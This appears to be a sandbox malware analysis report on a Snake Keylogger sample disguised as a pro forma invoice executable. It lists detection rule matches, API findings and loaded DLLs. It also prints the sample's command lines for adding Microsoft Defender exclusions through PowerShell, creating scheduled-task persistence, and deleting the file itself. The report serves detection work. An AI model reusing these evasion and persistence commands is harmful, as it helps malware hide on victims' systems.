Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: PROFORMA + PENDENTES.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WYqxTmjfOgdZ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, -.cs	Base64 encoded string: 'rVcDcqwDGuhtp0/cyaG3Tnaelff0t92wtBM+vhlsUrQBFjw1qEXRZosFllLoQ06t'
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, -.cs	Base64 encoded string: 'rVcDcqwDGuhtp0/cyaG3Tnaelff0t92wtBM+vhlsUrQBFjw1qEXRZosFllLoQ06t'

Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, uKGLrW3QqA3lP5biGX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, uKGLrW3QqA3lP5biGX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@33/15@3/2

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_03

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3E72.tmp

Jump to behavior

Source: PROFORMA + PENDENTES.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PROFORMA + PENDENTES.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PROFORMA + PENDENTES.exe

ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File read: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: rasadhlp.dll	Jump to behavior
